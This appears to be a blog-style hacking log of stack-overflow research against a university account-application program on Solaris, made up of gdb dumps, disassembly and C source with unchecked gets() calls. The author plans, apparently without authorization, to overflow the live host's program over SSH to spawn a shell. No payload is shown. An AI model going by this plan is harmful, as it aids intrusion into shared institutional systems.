Pearl — Hacking Apply Pt III

First was to obtain the source code from blade72,
/sources/apply-1.2
This wasn’t advertised, I happened to be digging around the filesystem one day and accidently stumbled upon it :)

fortunately it’s pre-compiled.. I move the sources to my own box..
run it..
need to make /home/apply user directory – need to create the whole apply user really.. – and /home/apply/setup file.

-bash-4.3$ cat /home/apply/setup
cs320-1|Applied Discrete Math|Prof. E. Polker|||||

^ ^ ^ The above wasn’t given to me, I had to figure out the format from this incomplete snippet:

load_params(Param_set)
struct param_set Param_set[];
{
int fd, i, j, n, linecnt;
char *a, *b, *bufend, *recend;
struct param_set *p;
struct group *g;

	DBUG(HELLO,"load_params()\n",NULL);
 	if ( (fd=open(SETUP,O_RDONLY)) < 0 )
	    fatal("Cannot open SETUP file.\n");
	/*
	 * For now read the whole file.  If it becomes worth it,
	 * take the trouble to read lines and discard comments.
	 */
	bufend = (buf - 1 + sizeof(buf));
	n=1; /* kick start the loop -- ugly! */
	for ( b=buf ; n > 0 && b < (bufend-BUFSIZ) ; b += n )
	    if ( (n=read(fd,b,BUFSIZ)) < 0 ) 
		fatal("Read error while getting SETUP file.\n");
	if ( b >= bufend ) {
	    fatal("Out of buffer space for parameter sets.\n");
	}
	else
	    bufend = b;	/* remember where end of buffered data is */
	close(fd);
	*bufend = EOS;

	/*
	 * Now chug along the buffer, initializing the Param_set array.
	 */
	for ( linecnt = 1, i = 0, b = buf, p = Param_set;
	      ( i < NPSETS && b < bufend );
	      linecnt++, b = recend + 1 )
	    {
	    DBUG(8,"Parsing SETUP line %d:\n",linecnt);
	    if ((recend=index(b,EOL)) == 0)
		/* somebody emacs'd SETUP and missed the last linefeed */
		recend = bufend;
	    *recend = EOS;
	    if ( *b != COMMENT ) {
		setptr(&p->gr_name,      &a,&b,linecnt);
		setptr(&p->course_name,  &a,&b,linecnt);
		setptr(&p->instructor,   &a,&b,linecnt);
		setptr(&p->notify_apply, &a,&b,linecnt);
		setptr(&p->notify_reply, &a,&b,linecnt);
		setptr(&p->course_time,  &a,&b,linecnt);
		setptr(&p->acct_type,    &a,&b,linecnt);
		DBUG(IGNORE,"group name: %s\n",p->gr_name);
#ifdef REPLY	/* apply doesn't care about homes or group id's */
		setgrent();	/* open/rewind group file */
		if ((g=getgrnam(p->gr_name)) == NULL) {
		    printf("Group %s: ",p->gr_name);	/* tacky */
		    fatal("Cannot get gid from /etc/group.\n");
		}
		p->gr_gid = g->gr_gid;
		DBUG(8,"gid found: %d\n",p->gr_gid);
		for (j=0; b<recend && j<MAXHOMES; j++,b=a+1) {
		    p->homes[j] = b;
		    a = index(b,SFS);
		    if (a != 0)
			*a = EOS;
		    else
			a = recend;
		    DBUG(8,"\t\tp->homes[%d]==",j);
		    DBUG(8,"%s\n",b);
		}
		p->homes[j] = NULL; /* flag end of valid entries */
#endif /* REPLY */
		i++;
		p++;
	    }
	}
#ifdef REPLY
	endgrent();	/* close group file */
#endif /* REPLY */
	if ( b < bufend && i >= NPSETS )
	    fatal("Out of data structures for parameter sets!");
	DBUG(4,"load_params returning %d\n",i);
	return(i);	/* Number of sets loaded into array */
}

setptr(p,a,b,linecnt)
char **p, **a, **b;
{
	*p = *b;
	if ((*a = index(*b,PFS)) != 0) {
	    **a = EOS;
	    *b = *a+1;
	}
	else {
	    printf("Broken record in SETUP file: line %d.\n", linecnt);
	    fatal("Cannot continue.");
	}
}

I learned a few IMPORTANT things.
I can send a buffer overflow through a raw PTY through SSH :) Did IT!
compilin an app with/without debugging symbols does not affect the stack address.

I also now know it’s very important to attack the original binary, if at all possible, because such things
such as stack frames being restored may differ between your own compilation of the program vs. the original.

Found my buffer overflow attack vector: register as new user, derp passwd, ugrad sign up, register 1 group course, q, then to “is this ok?” say “n”, and then put in a buffer large that starts with ‘q’ – q is for the first char to be processed as a direct return. Then you must agree that it looks “OK” with ‘y.’ Hopefully that caller stack is not too borked in that it can get to the return. If we get that far.. Well sweet sauce

It’s very important to ensure the nested target functions both ret/restore at the end of their functions. This ensures the stack is getting rotated and return values are popping.

-bash-4.3$ cd latest/apply-1.2-stock/
-bash-4.3$ ls
Makefile         apply-externs.o  make.history     reply-subr.o
OLD              apply-subr.o     make.out         reply.c
RCS              apply.c          mkaccounts       reply.o
README           apply.o          passwd.c         reply.real
add_groups       externs.c        ply.h            script
add_groups.c     how_to.tex.f90   reply            subr.c
apply            invoke2          reply-externs.o
-bash-4.3$ $PWD/invoke2 -d apply
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)
(gdb) break Review
Breakpoint 1 at 0x12434
(gdb) r
Starting program: /home/bazz/latest/apply-1.2-stock/apply
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Welcome to ---------, our host that handles account applications.

This program collects information needed to create accounts, and queues
applications for action by the system administrator.  When all your
information has been collected, you will have the chance to review your
application and re-enter any information that is not correct.

If you make a mistake in typing, you can back up on the line by pressing the
DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters --
your input may appear to have been fixed but will really contain garbage.
If you press the RETURN key before noticing an error, do not worry.  Simply
continue answering questions, and re-enter the information later during the
review phase.

Press RETURN to continue.

Do you already have an account with us (y or n)? n

Enter your chosen login name.  It can be up to 8 characters long, and should
only use lowercase letters and digits.  Please use your first initial and
last name, as in jdoe, unless you have a strong preference otherwise.
Login name? jdoe

Please enter your full name.  Be sure to use upper and lower case, as in
John Q. Public.  It is very important to get this right, as this is how
your name will appear on lab access lists and in mail messages you send.
Full name? jdoe

Enter a password consisting of printable characters, spaces or tabs.
It can be as long as you like, but only the first 8 characters matter.
Do not use your login or real name in any form -- too easy to guess.
**-*-* Do not give your password to anybody under any circumstances! *-*-**

As you type in your password, characters will not be echoed to your screen.
This is to protect your account.  To be sure you did not mis-type anything,
you will be asked to enter your password a second time.

Password:
   Again:

[Note : the password has to be entered via a PTY Master ]

Please describe yourself by choosing one of these menu items:

1) ugrad    Undergraduate student enrolled in one or more CS courses
2) grad     Graduate student enrolled in one or more CS courses
3) alumni   Alumnus of Math and CS
4) faculty  Member of the Math and CS faculty
5) staff    Member of the Math and CS professional or classified staff
6) crtsy    Courtesy account applicant that has spoken to the Sys Admin
7)          None of the above.  (This will abandon the application!)
Menu item number [1-7] or command [tpx?] : 1

Now you will be shown a list of the available groups.  Classes are set up
as UNIX groups, and there are groups for other kinds of accounts, too.
Please enter the number(s) of the group(s) or class(es) that you belong in.
Enter them one at a time.  When there are no more to enter, type q to stop.
Remember that if you make an error, you will have a chance to do this again.

Sometimes the list is more than a screenful, so we use the `more` command
to present a screenful at a time.  If you see the '[More]' prompt, then
press RETURN for the next line, SPACE for the next screen.
You may want to write down the menu item numbers for your course(s).

Press RETURN to continue.

These are the categories of accounts:
 1) cs320-1   Applied Discrete Math     Prof. E. Bolker
Press RETURN to see menu again; 'q' to quit adding groups; '?' for more help.
Please enter a group number [1-1] or command [cptqx?] : 1
Press RETURN to see menu again; 'q' to quit adding groups; '?' for more help.
Please enter a group number [1-1] or command [cptqx?] : q

Breakpoint 1, 0x00012434 in Review ()
(gdb) x/5i $pc
0x12434 <Review+8>:     sethi  %hi(0x29000), %g1
0x12438 <Review+12>:    or  %g1, 0x1a0, %o5     ! 0x291a0 <_iob+16>
0x1243c <Review+16>:    sethi  %hi(0x29000), %g1
0x12440 <Review+20>:    or  %g1, 0x1a0, %g1     ! 0x291a0 <_iob+16>
0x12444 <Review+24>:    ld  [ %g1 ], %g1
(gdb) x/5i $pc-8
0x1242c <Review>:       save  %sp, -112, %sp
0x12430 <Review+4>:     st  %i0, [ %fp + 0x44 ]
0x12434 <Review+8>:     sethi  %hi(0x29000), %g1
0x12438 <Review+12>:    or  %g1, 0x1a0, %o5     ! 0x291a0 <_iob+16>
0x1243c <Review+16>:    sethi  %hi(0x29000), %g1
(gdb) x/96x $sp
0xffbefd58:     0xffbef9a8      0x00028d90      0x00000000      0x00000000
0xffbefd68:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefd78:     0x00027ccc      0x00028d91      0x0002919e      0x00000001
0xffbefd88:     0xff33c008      0x00000003      0xffbefdc8      0x00011434
0xffbefd98:     0x00000000      0x00027ccc      0x00027cc0      0x00000031
0xffbefda8:     0x00000032      0x00000000      0x00000001      0x00000000
0xffbefdb8:     0xff33f014      0xff320208      0xffbefdc8      0x0001135c
0xffbefdc8:     0xff33e5f0      0x00000000      0x00000000      0x00000000
0xffbefdd8:     0x00000000      0x00000000      0x00000000      0xff3de7a8
0xffbefde8:     0x00000001      0xffbefebc      0xffbefec4      0x0002a6e4
0xffbefdf8:     0x00000000      0x00000000      0xffbefe58      0x00010fec
0xffbefe08:     0x00000000      0x00027ccc      0xffbefe78      0x00000000
0xffbefe18:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe28:     0x00000003      0x00000000      0x00000000      0x00000000
0xffbefe38:     0x00000000      0xffffffff      0x00000000      0x00000000
0xffbefe48:     0x00000000      0x00000000      0xffbefe58      0x00010fac
0xffbefe58:     0x00000001      0xffbefebc      0x00000000      0x00000000
0xffbefe68:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe78:     0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0xffbefe88:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe98:     0x00000000      0x00000001      0xffbefebc      0x00000000
0xffbefea8:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefeb8:     0x00000001      0xffbeff50      0x00000000      0xffbeff78
0xffbefec8:     0xffbeff83      0xffbeff8c      0xffbeffb2      0x00000000
(gdb) b Edit
Breakpoint 2 at 0x12564
(gdb) c
Continuing.

Name: jdoe  Login: jdoe  Account type: ugrad  Group(s): cs320-1
Is this okay (y or n)? n

Breakpoint 2, 0x00012564 in Edit ()
(gdb) x/96x $sp
0xffbefce0:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefcf0:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefd00:     0x00027ccc      0x000291a0      0x0000000a      0x00000002
0xffbefd10:     0xff33c008      0x000291a0      0xffbefd58      0x000124cc
0xffbefd20:     0xff33c008      0x000291a0      0x00025cc0      0xff343a54
0xffbefd30:     0x00000000      0x000294e0      0x00000000      0x000291a0
0xffbefd40:     0x00000001      0x00000001      0xff33c008      0x000291a0
0xffbefd50:     0xffbefd58      0x00012468      0xffbef9a8      0x00028d90
0xffbefd60:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefd70:     0x00000000      0x00000000      0x00027ccc      0x00028d91
0xffbefd80:     0x0002919e      0x00000001      0xff33c008      0x00000003
0xffbefd90:     0xffbefdc8      0x00011434      0x00000000      0x00027ccc
0xffbefda0:     0x00027cc0      0x00000031      0x00000032      0x00000000
0xffbefdb0:     0x00000001      0x00000000      0xff33f014      0xff320208
0xffbefdc0:     0xffbefdc8      0x0001135c      0xff33e5f0      0x00000000
0xffbefdd0:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefde0:     0x00000000      0xff3de7a8      0x00000001      0xffbefebc
0xffbefdf0:     0xffbefec4      0x0002a6e4      0x00000000      0x00000000
0xffbefe00:     0xffbefe58      0x00010fec      0x00000000      0x00027ccc
---Type <return> to continue, or q <return> to quit---
0xffbefe10:     0xffbefe78      0x00000000      0x00000000      0x00000000
0xffbefe20:     0x00000000      0x00000000      0x00000003      0x00000000
0xffbefe30:     0x00000000      0x00000000      0x00000000      0xffffffff
0xffbefe40:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe50:     0xffbefe58      0x00010fac      0x00000001      0xffbefebc
(gdb)
-bash-4.3$ pwd
/home/bazz/latest/apply-1.2-stock
-bash-4.3$
-bash-4.3$ ./apply&

Welcome to --------, our host that handles account applications.

This program collects information needed to create accounts, and queues
applications for action by the system administrator.  When all your
information has been collected, you will have the chance to review your
application and re-enter any information that is not correct.

If you make a mistake in typing, you can back up on the line by pressing the
DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters --
your input may appear to have been fixed but will really contain garbage.
If you press the RETURN key before noticing an error, do not worry.  Simply
continue answering questions, and re-enter the information later during the
review phase.

Press RETURN to continue.
[1] 1092

[1]+  Stopped                 ./apply
-bash-4.3$ pmap 1092
1092:   ./apply
00010000     24K read/exec         apply
00024000      8K read/write/exec   apply
00026000     24K read/write/exec     [ heap ]
FF180000    576K read/exec         /usr/lib/libnsl.so.1
FF210000     40K read/write/exec   /usr/lib/libnsl.so.1
FF21A000     24K read/write/exec   /usr/lib/libnsl.so.1
FF250000     16K read/exec         /usr/platform/sun4u/lib/libc_psr.so.1
FF260000     16K read/exec         /usr/lib/libmp.so.2
FF274000      8K read/write/exec   /usr/lib/libmp.so.2
FF280000    688K read/exec         /usr/lib/libc.so.1
FF33C000     32K read/write/exec   /usr/lib/libc.so.1
FF350000      8K read/write/exec     [ anon ]
FF360000      8K read/write/exec   /usr/lib/libdl.so.1
FF370000     40K read/exec         /usr/lib/libsocket.so.1
FF38A000      8K read/write/exec   /usr/lib/libsocket.so.1
FF3A0000    184K read/exec         /usr/lib/ld.so.1
FF3DE000      8K read/write/exec   /usr/lib/ld.so.1
FF3E0000      8K read/write/exec   /usr/lib/ld.so.1
FFBEE000      8K read/write/exec     [ stack ]
 total     1728K
-bash-4.3$

this says that the stack in apply is also 8K like from test vuln program, and also starts at the same address.

TO BE CONTINUED —
from here on out I will keep it a secret and just let it go….. NAHT
I am going to exploit an overflow in the above targeted stack frames.
After I create a specific targeted exploit, I will then learn how to do NOP slide with automatic slicing offsets.

The current end goal is to be able to ssh into the target application, manually navigate to the vulnerable section, CTRL-D to trigger the buffer overflow. If a shell is spawned, disable all signal catchers by throwing another seperate signal. Then haxxor away. Tell teh feds.
But, if the shell doesn’t spawn, an automatic slice counter should increment when the buffer signal is sent. I will then reconnect and perform manual duties — Send the buffer. This shouldn’t have to be done more than a max of 9 or 10 times or less, given that the stack is 8192 bytes, the buffer is 1024 before even starting to be overflowed. Plenty of room for a great NOP slide.. I will have to investigate the premium buffer. I am leaning towards putting the payload before the return address to make use of the guaranteed 1024 bytes + the few after 1024 that come before the %fp. Will have to calculate that.. Alright PEACE!

BACK AGAIN

-bash-4.3$ ./pty_apply
Opening master device
Doing Grantpt()
Unlocking pt
getting stdin termios
getting window settings
---Getting slave name
---Opening slave
Forking
in CHILD:
---Setsid()
---Pushing ptem module to slave
---Pushing ldterm module to slave
---setting term settings
---setting window settings
In Parent:
This shell is interactive
                         bazz@life[pts/8][~/latest/pty] bazz@life[pts/8][~/latest/pty] bazz@life[pts/8][~/latest] bazz@life[pts/8][~/latest]
                                                             bazz@life[pts/8][~/latest]
        bazz@life[pts/8][~/latest]
                                   bazz@life[pts/8][~/latest]

In the middle of the blind chaos I have to do

 stty echo
bazz@life[pts/8][~/latest] cd ~/latest/apply-1.2-stock/
                                     bazz@life[pts/8][~/latest/apply-1.2-stock] $PWD/invoke2 -d apply
                     GNU gdb 6.6
                                Copyright (C) 2006 Free Software Foundation, Inc.
 GDB is free software, covered by the GNU General Public License, and you are
                                                                             welcome to change it and/or distribute copies of it under certain conditions.
                                                                          Type "show copying" to see the conditions.
                                    There is absolutely no warranty for GDB.  Type "show warranty" for details.
                               This GDB was configured as "sparc-sun-solaris2.8"...
   (no debugging symbols found)
                               (gdb) break Review
                                                 Breakpoint 1 at 0x12434
                                                                        (gdb) break Edit
        Breakpoint 2 at 0x12564
                               (gdb) r
                                      Starting program: /home/bazz/latest/apply-1.2-stock/apply
                (no debugging symbols found)
                                            warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
                                                     (no debugging symbols found)
 (no debugging symbols found)
                             (no debugging symbols found)
                                                         (no debugging symbols found)
     (no debugging symbols found)
                                 (no debugging symbols found)
                                                             (no debugging symbols found)

         Welcome to --, our host that handles account applications.

 This program collects information needed to create accounts, and queues
                                                                        applications for action by the system administrator.  When all your
                                                           information has been collected, you will have the chance to review your
                                                  application and re-enter any information that is not correct.

                               If you make a mistake in typing, you can back up on the line by pressing the
                           DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters --
                      your input may appear to have been fixed but will really contain garbage.
               If you press the RETURN key before noticing an error, do not worry.  Simply
          continue answering questions, and re-enter the information later during the
     review phase.

                  Press RETURN to continue.

Do you already have an account with us (y or n)?

at this point it’s important to note that I have to use CTRL-J to make the newline, and hence continue..

It turns out that the attack vector illustrated above is not going to work. The buffer passed into gets() is a global buffer, I need something local to be easy. So I search around and I find this:

...

Never mind, it was a #ifdef code block that doesn’t actually count :(

gets(buf) from Login() looks good

Login(datap)
struct info *datap;
{
struct passwd *pw;
char	buf[1024], *ch, c;
int okay, n;

    DBUG(HELLO,"** Login()\n",NULL);
    if (action == MODIFY) {
	printf("You cannot change the login name of an existing account!\n");
	printf("If you MUST change your login see the system administrator.\n");
	return(0);
    }
    for ( okay=FALSE; okay==FALSE; ) {
	blurb(Login_inst);
	printf("Login name? ");
	gets(buf);

>_< nevermind [code lang="c"] if ((n=strlen(buf)) < 1) continue; else { if (n > MAXLOGLEN) { printf("Your login name must not be longer than %d characters.\n", MAXLOGLEN); printf("Please try again.\n"); contin [/code] How about the YES-OR-NO prompt?!?!

/* Ask a yes-or-no question. */
askyorn(prompt)
char	*prompt;
{
char	c[SBUF];
int	n;

    for (n=0; n < 10; ++n){
	printf("%s (y or n)? ", prompt);
	gets(c);
	switch (c[0]){
	    case 'y':
	    case 'Y': return(1);
	    case 'n':
	    case 'N': return(0);
	    default :
		      printf("Please answer y or n: ");
		      continue;
	}
    }
    return(0);	/* return negative if they can't get it right */
}

I THINK WE HAVE A WINNER
My goal is to be able to return into the overflowed buffer before the apply program submits any recorded data. Then someone could figure something out a lot easier. I just found my way in.

WELL I RAN into a new problem. The PTY write of a large buffer cuts out around 1300-1400. I wonder how can I get the full 6000 in there?? :( the answer is in fact that ‘stty echo’ should not be invoked. it has to do with it somehow…

AND THIS is the life of someone hacking from a raw terminal :

bazz@life[pts/15][~/latest/apply-1.2-stock]
                                                                                                                      Welcome to ------, our host that handles account applications.

                                               This program collects information needed to create accounts, and queues
                                                                                                                      applications for action by the system administrator.  When all your
                                          information has been collected, you will have the chance to review your
                                                                                                                 application and re-enter any information that is not correct.

                               If you make a mistake in typing, you can back up on the line by pressing the
                                                                                                           DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters --
                                       your input may appear to have been fixed but will really contain garbage.
                                                                                                                If you press the RETURN key before noticing an error, do not worry.  Simply
                                            continue answering questions, and re-enter the information later during the
                                                                                                                       review phase.

                                                                                                                                    Press RETURN to continue.
              Do you already have an account with us (y or n)?
                                                               Enter your chosen login name.  It can be up to 8 characters long, and should
                                                                                                                                           only use lowercase letters and digits.  Please use your first initial and
                                                                     last name, as in jdoe, unless you have a strong preference otherwise.
                                                                                                                                          Login name?
       Enter your chosen login name.  It can be up to 8 characters long, and should
                                                                                   only use lowercase letters and digits.  Please use your first initial and
             last name, as in jdoe, unless you have a strong preference otherwise.
                                                                                  Login name?
                                                                                              Please enter your full name.  Be sure to use upper and lower case, as in
                       John Q. Public.  It is very important to get this right, as this is how
                                                                                              your name will appear on lab access lists and in mail messages you send.
                       Full name?
                                  Enter a password consisting of printable characters, spaces or tabs.
                                                                                                      It can be as long as you like, but only the first 8 characters matter.
                             Do not use your login or real name in any form -- too easy to guess.
                                                                                                 **-*-* Do not give your password to anybody under any circumstances! *-*-**

                             As you type in your password, characters will not be echoed to your screen.
                                                                                                        This is to protect your account.  To be sure you did not mis-type anything,
                                    you will be asked to enter your password a second time.

                                                                                           Password:
                                                                                                        Again:


                                                                                                              Please describe yourself by choosing one of these menu items:

                            1) ugrad    Undergraduate student enrolled in one or more CS courses
                                                                                                2) grad     Graduate student enrolled in one or more CS courses
                3) alumni   Alumnus of Math and CS
                                                      4) faculty  Member of the Math and CS faculty
                                                                                                   5) staff    Member of the Math and CS professional or classified staff
                          6) crtsy    Courtesy account applicant that has spoken to the Sys Admin
                                                                                                 7)          None of the above.  (This will abandon the application!)
                      Menu item number [1-7] or command [tpx?] : You must select one of the choices.
                                                                                                    Do you want to just forget the whole thing (y or n)? Menu item number [1-7] or command [tpx?] : Bus Error
                                                              bazz@life[pts/15][~/latest/apply-1.2-stock] bazz@life[pts/15][~/latest/apply-1.2-stock] GNU gdb 6.6
                  Copyright (C) 2006 Free Software Foundation, Inc.
                                                                   GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
                                                                             Type "show copying" to see the conditions.
                                                                                                                       There is absolutely no warranty for GDB.  Type "show warranty" for details.
                                                   This GDB was configured as "sparc-sun-solaris2.8"...
                                                                                                       (no debugging symbols found)
                                                                                                                                   (gdb) Dump of assembler code for function Acct:
                                   0x000114c0 <Acct+0>:	save  %sp, -136, %sp
                                                                            0x000114c4 <Acct+4>:	st  %i0, [ %fp + 0x44 ]
                                                                                                                               0x000114c8 <Acct+8>:	sethi  %hi(0x25800), %g1
                                0x000114cc <Acct+12>:	or  %g1, 0x260, %o0	! 0x25a60 <Acct_inst>
                                                                                                     0x000114d0 <Acct+16>:	call  0x13274 <blurb>
      0x000114d4 <Acct+20>:	nop
                                    0x000114d8 <Acct+24>:	ld  [ %fp + 0x44 ], %g1
                                                                                       0x000114dc <Acct+28>:	add  %g1, 0x804, %g1
                                                                                                                                    0x000114e0 <Acct+32>:	mov  %g1, %o0
                             0x000114e4 <Acct+36>:	sethi  %hi(0x13c00), %g1
                                                                                0x000114e8 <Acct+40>:	or  %g1, 0x148, %o1	! 0x13d48
                                                                                                                                         0x000114ec <Acct+44>:	call  0x25820 <strcpy@plt>
                                          0x000114f0 <Acct+48>:	nop
                                                                    ---Type <return> to continue, or q <return> to quit---0x000114f4 <Acct+52>	sethi  %hi(0x13c00), %g1
                        0x000114f8 <Acct+56>:	or  %g1, 0x150, %o0	! 0x13d50
                                                                                 0x000114fc <Acct+60>:	mov  7, %o1
                                                                                                                   0x00011500 <Acct+64>:	call  0x257d8 <printf@plt>
                          0x00011504 <Acct+68>:	nop
                                                    0x00011508 <Acct+72>:	sethi  %hi(0x28c00), %g1
                                                                                                        0x0001150c <Acct+76>:	or  %g1, 0x190, %o0	! 0x28d90 <ibuf>
                        0x00011510 <Acct+80>:	call  0x25808 <gets@plt>
                                                                        0x00011514 <Acct+84>:	nop
                                                                                                    0x00011518 <Acct+88>:	mov  %o0, %g1
                                                                                                                                             0x0001151c <Acct+92>:	cmp  %g1, 0
                                   0x00011520 <Acct+96>:	bne  0x1154c <Acct+140>
                                                                                       0x00011524 <Acct+100>:	nop
                                                                                                                    0x00011528 <Acct+104>:	sethi  %hi(0x28c00), %g1
                        ---Type <return> to continue, or q <return> to quit---0x0001152c <Acct+108>:	or  %g1, 0x190, %o5	! 0x28d90 <ibuf>
 0x00011530 <Acct+112>:	mov  0x78, %g1
                                      0x00011534 <Acct+116>:	stb  %g1, [ %o5 ]
                                                                                 0x00011538 <Acct+120>:	sethi  %hi(0x28c00), %g1
                                                                                                                                0x0001153c <Acct+124>:	or  %g1, 0x191, %g1	! 0x28d91 <ibuf+1>
                                                  0x00011540 <Acct+128>:	clrb  [ %g1 ]
                                                                                             0x00011544 <Acct+132>:	b  0x11574 <Acct+180>
                                                                                                                                             0x00011548 <Acct+136>:	nop
                            0x0001154c <Acct+140>:	sethi  %hi(0x28c00), %g1
                                                                                0x00011550 <Acct+144>:	or  %g1, 0x190, %g1	! 0x28d90 <ibuf>
 0x00011554 <Acct+148>:	ldub  [ %g1 ], %g1
                                          0x00011558 <Acct+152>:	sll  %g1, 0x18, %g1
                                                                                           0x0001155c <Acct+156>:	sra  %g1, 0x18, %g1
                                                                                                                                           0x00011560 <Acct+160>:	cmp  %g1, 0
                                   ---Type <return> to continue, or q <return> to quit---0x00011564 <Acct+164>:	bne  0x11574 <Acct+180>
                                                                                                                                       0x00011568 <Acct+168>:	nop
                    0x0001156c <Acct+172>:	b  0x114f4 <Acct+52>
                                                                    0x00011570 <Acct+176>:	nop
                                                                                                    0x00011574 <Acct+180>:	sethi  %hi(0x28c00), %g1
         0x00011578 <Acct+184>:	or  %g1, 0x190, %g1	! 0x28d90 <ibuf>
                                                                        0x0001157c <Acct+188>:	ldub  [ %g1 ], %g1
                                                                                                                  0x00011580 <Acct+192>:	sll  %g1, 0x18, %g1
                   0x00011584 <Acct+196>:	sra  %g1, 0x18, %g1
                                                                   0x00011588 <Acct+200>:	st  %g1, [ %fp + -36 ]
                                                                                                                      0x0001158c <Acct+204>:	ld  [ %fp + -36 ], %g1
                      0x00011590 <Acct+208>:	cmp  %g1, 0x74
                                                              0x00011594 <Acct+212>:	be  0x115ec <Acct+300>
                                                                                                              0x00011598 <Acct+216>:	nop
                                                                                                                                            ---Type <return> to continue, or q <return> to quit---0x0001159c <Acct+220>:	ld  [ %fp + -36 ], %g1
                                                                                                      0x000115a0 <Acct+224>:	cmp  %g1, 0x74
                                                                                                                                              0x000115a4 <Acct+228>:	bg  0x115d4 <Acct+276>
                                              0x000115a8 <Acct+232>:	nop
                                                                            0x000115ac <Acct+236>:	ld  [ %fp + -36 ], %g1
                                                                                                                              0x000115b0 <Acct+240>:	cmp  %g1, 0x3f
                      0x000115b4 <Acct+244>:	be  0x11824 <Acct+868>
                                                                      0x000115b8 <Acct+248>:	nop
                                                                                                    0x000115bc <Acct+252>:	ld  [ %fp + -36 ], %g1
       0x000115c0 <Acct+256>:	cmp  %g1, 0x70
                                              0x000115c4 <Acct+260>:	be  0x11600 <Acct+320>
                                                                                              0x000115c8 <Acct+264>:	nop
                                                                                                                            0x000115cc <Acct+268>:	b  0x11658 <Acct+408>
                             0x000115d0 <Acct+272>:	nop
                                                            ---Type <return> to continue, or q <return> to quit---0x000115d4 <Acct+276>:	ld  [ %fp + -36 ], %g1
                      0x000115d8 <Acct+280>:	cmp  %g1, 0x78
                                                              0x000115dc <Acct+284>:	be  0x11618 <Acct+344>
                                                                                                              0x000115e0 <Acct+288>:	nop
                                                                                                                                            0x000115e4 <Acct+292>:	b  0x11658 <Acct+408>
                                             0x000115e8 <Acct+296>:	nop
                                                                            0x000115ec <Acct+300>:	ld  [ %fp + 0x44 ], %o0
                                                                                                                               0x000115f0 <Acct+304>:	call  0x132d0 <show_info>
                                 0x000115f4 <Acct+308>:	nop
                                                            0x000115f8 <Acct+312>:	b  0x114f4 <Acct+52>
                                                                                                            0x000115fc <Acct+316>:	nop
                                                                                                                                            0x00011600 <Acct+320>:	sethi  %hi(0x25800), %g1
                                                0x00011604 <Acct+324>:	or  %g1, 0x260, %o0	! 0x25a60 <Acct_inst>
                                                                                                                     0x00011608 <Acct+328>:	call  0x13274 <blurb>
                     ---Type <return> to continue, or q <return> to quit---0x0001160c <Acct+332>:	nop
                                                                                                            0x00011610 <Acct+336>:	b  0x114f4 <Acct+52>
             0x00011614 <Acct+340>:	nop
                                            0x00011618 <Acct+344>:	sethi  %hi(0x13c00), %g1
                                                                                                0x0001161c <Acct+348>:	or  %g1, 0x180, %o0	! 0x13d80
         0x00011620 <Acct+352>:	call  0x257d8 <printf@plt>
                                                          0x00011624 <Acct+356>:	nop
                                                                                            0x00011628 <Acct+360>:	sethi  %hi(0x13c00), %g1
 0x0001162c <Acct+364>:	or  %g1, 0x1a8, %o0	! 0x13da8
                                                         0x00011630 <Acct+368>:	call  0x12a30 <askyorn>
                                                                                                       0x00011634 <Acct+372>:	nop
                                                                                                                                    0x00011638 <Acct+376>:	mov  %o0, %g1
                             0x0001163c <Acct+380>:	cmp  %g1, 0
                                                                   0x00011640 <Acct+384>:	be  0x114f4 <Acct+52>
                                                                                                                     ---Type <return> to continue, or q <return> to quit---0x00011644 <Acct+388>:	nop
                                                            0x00011648 <Acct+392>:	call  0x1320c <quit>
                                                                                                            0x0001164c <Acct+396>:	nop
                                                                                                                                            0x00011650 <Acct+400>:	b  0x114f4 <Acct+52>
                                            0x00011654 <Acct+404>:	nop
                                                                            0x00011658 <Acct+408>:	sethi  %hi(0x28c00), %g1
                                                                                                                                0x0001165c <Acct+412>:	or  %g1, 0x190, %g1	! 0x28d90 <ibuf>
                                                0x00011660 <Acct+416>:	ldub  [ %g1 ], %g1
                                                                                          0x00011664 <Acct+420>:	sll  %g1, 0x18, %g1
                                                                                                                                           0x00011668 <Acct+424>:	sra  %g1, 0x18, %o5
                                           0x0001166c <Acct+428>:	sethi  %hi(0x29000), %g1
                                                                                                0x00011670 <Acct+432>:	or  %g1, 0x2d1, %g1	! 0x292d1 <_ctype+1>
                    0x00011674 <Acct+436>:	ldub  [ %o5 + %g1 ], %g1
                                                                        0x00011678 <Acct+440>:	and  %g1, 0xff, %g1
                                                                                                                   ---Type <return> to continue, or q <return> to quit---0x0001167c <Acct+444>:	srl  %g1, 2, %g1
                                                                        0x00011680 <Acct+448>:	and  %g1, 1, %g1
                                                                                                                0x00011684 <Acct+452>:	cmp  %g1, 0
    0x00011688 <Acct+456>:	be  0x11814 <Acct+852>
                                                      0x0001168c <Acct+460>:	nop
                                                                                    0x00011690 <Acct+464>:	sethi  %hi(0x28c00), %g1
                                                                                                                                        0x00011694 <Acct+468>:	or  %g1, 0x190, %o0	! 0x28d90 <ibuf>
                                                        0x00011698 <Acct+472>:	call  0x2582c <atoi@plt>
                                                                                                        0x0001169c <Acct+476>:	nop
                                                                                                                                    0x000116a0 <Acct+480>:	mov  %o0, %g1
